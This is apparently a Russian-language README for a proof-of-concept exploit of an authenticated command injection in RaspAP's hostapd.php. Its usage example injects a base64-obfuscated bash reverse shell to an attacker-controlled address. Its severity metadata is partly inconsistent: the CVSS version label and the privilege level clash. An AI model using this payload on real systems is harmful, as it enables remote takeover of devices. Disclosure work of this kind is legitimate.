
Proof of concept for the vulnerability CVE-2025-50428: Authenticated OS Command Injection in RaspAP
Эксплойт для CVE-2025-50428, уязвимости внедрения команд в raspap-webgui 3.2.9 и более ранних версиях.
| Идентификатор уязвимости | CVE-2025-50428 |
|---|---|
| Степень серьезности | Высокая (CVSS 3.1: 8.6) |
| Вектор CVSS | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| Тип уязвимости | Внедрение кода |
| Вектор атаки | Удаленный (требуется аутентификация) |
| Необходимые привилегии | Низкие |
| Воздействие | Выполнение кода, повышение привилегий |
| Затрагиваемый продукт | raspap-webgui ≤ 3.2.9 |
| Обнаружено | SmartTECS Cyber Security GmbH |
Этот эксплойт направлен на уязвимость внедрения команд в скрипте hostapd.php RaspAP. Уязвимость возникает из-за некорректной санитизации пользовательского ввода, передаваемого через параметр interface. Аутентифицированный злоумышленник может внедрить произвольные команды ОС, что приведет к выполнению кода с привилегиями пользователя www-data.
requestspython3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]
--base-url: Базовый URL установки RaspAP (например, http://192.168.122.22)--interface: Значение для параметра interface, допускается полезная нагрузка внедрения--username: Имя пользователя RaspAP (по умолчанию: admin)--password: Пароль RaspAP (по умолчанию: secret)python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"
SmartTECS Cyber Security GmbH — компания в области кибербезопасности, специализирующаяся на тестировании на проникновение, разработке безопасного программного обеспечения и исследовании уязвимостей. Компания предоставляет индивидуальные оценки безопасности, реагирование на инциденты и стратегические консультационные услуги, помогая организациям защитить критически важные системы от evolving киберугроз.
Данный инструмент предоставляется строго для образовательных и исследовательских целей. Используйте только на системах, которыми вы владеете или на которые имеете явное разрешение. Автор и SmartTECS Cyber Security GmbH не несут ответственности за неправомерное использование или нанесенный ущерб.